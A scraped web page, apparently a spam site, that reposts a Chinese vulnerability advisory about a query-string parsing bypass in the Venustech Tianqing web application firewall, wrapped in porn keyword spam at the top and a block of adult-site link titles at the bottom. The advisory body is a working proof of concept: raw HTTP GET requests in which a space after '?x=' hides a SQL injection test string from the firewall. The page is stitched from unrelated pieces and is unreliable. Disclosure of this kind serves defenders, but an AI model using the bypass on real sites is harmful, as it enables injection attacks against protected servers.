六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

啟明星辰天清Web應用安全網關協議解析繞過漏洞

[摘要]啟明星辰天清Web應用安全網關中存在協議解析繞過漏洞,該漏洞源于對http協議兼容未正確處理。攻擊者可利用該漏洞繞過WAF對于querystring的所有過濾,從而攻擊受保護的網站。 Serv...



    啟明星辰天清Web應用安全網關中存在協議解析繞過漏洞,該漏洞源于對http協議兼容未正確處理。攻擊者可利用該漏洞繞過WAF對于querystring的所有過濾,從而攻擊受保護的網站。
    Servlet/2.5等jsp處理容器,能夠正確處理http協議GET /news.jsp?x= &id=16 HTTP/1.1中參數&id=16前面的空格獲取id=16這個參數,例如下數據包返回網頁正常:


    GET /news.jsp?x= &id=16 HTTP/1.1

    Accept: text/html, application/xhtml+xml, */*

    Accept-Language: zh-CN

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

    Connection: close

    Host: www.test.com

    Pragma: no-cache





    與http://www.test.com/news.jsp?id=16返回網頁相同。





    而啟明星辰天清Web應用安全網關解析協議時,會忽略GET /news.jsp?x= &id=16%20and%201=1 HTTP/1.1中"?x=空格"之后的參數,從而繞過防護。

    例直接訪問:http://www.test.com/news.jsp?x=%20&id=16%20and%201=1會攔截

    構造如下poc繞過:

    GET /news.jsp?x= &id=16%20and%201=1 HTTP/1.1

    Accept: text/html, application/xhtml+xml, */*

    Accept-Language: zh-CN

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

    Connection: close

    Host: www.test.com

    Pragma: no-cache

    修復方案:

    正確解析http請求第一行中 url參數帶空格字符后的參數
 


上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。




主站蜘蛛池模板: 深夜毛片| 日韩第十页 | 我怒了在线播放完整版 | 天天上天天操 | 手机在线成人精品视频网 | 婷婷四房综合激情五月性色 | 日本特黄特色aaa大片免费欧 | 青青草偷拍视频 | 字幕网中文aⅴ资源站 | 午夜精品视频在线 | 伊人免费视频网 | 欧美综合一区二区三区 | 午夜影视体验区 | 天堂国产在线观看 | 日在线视频 | 亚洲男人在线天堂 | 日韩中文字幕免费版 | 四虎永久免费影院 | 性免费网站 | 伊人久久大线蕉香港三级 | 四虎影院永久 | 一二三四视频中文字幕 | 人人看人人鲁狠狠高清 | 亚洲国产日韩在线观频 | 日韩欧美在线播放 | 色综合久久夜色精品国产 | 亚洲精品天堂在线观看 | 欧美一级www片免费观看 | 日韩99在线 | 日本在线高清视频 | 天天射天天干天天操 | 亚洲一区二区影视 | 人人免费人人专区 | 亚洲四虎在线 | 日日夜夜婷婷 | 青青草原在线 | 五月激情综合 | 亚洲人成在线观看男人自拍 | 一级做受视频免费是看美女 | 三级亚洲| 日韩精品一区二区三区中文在线 |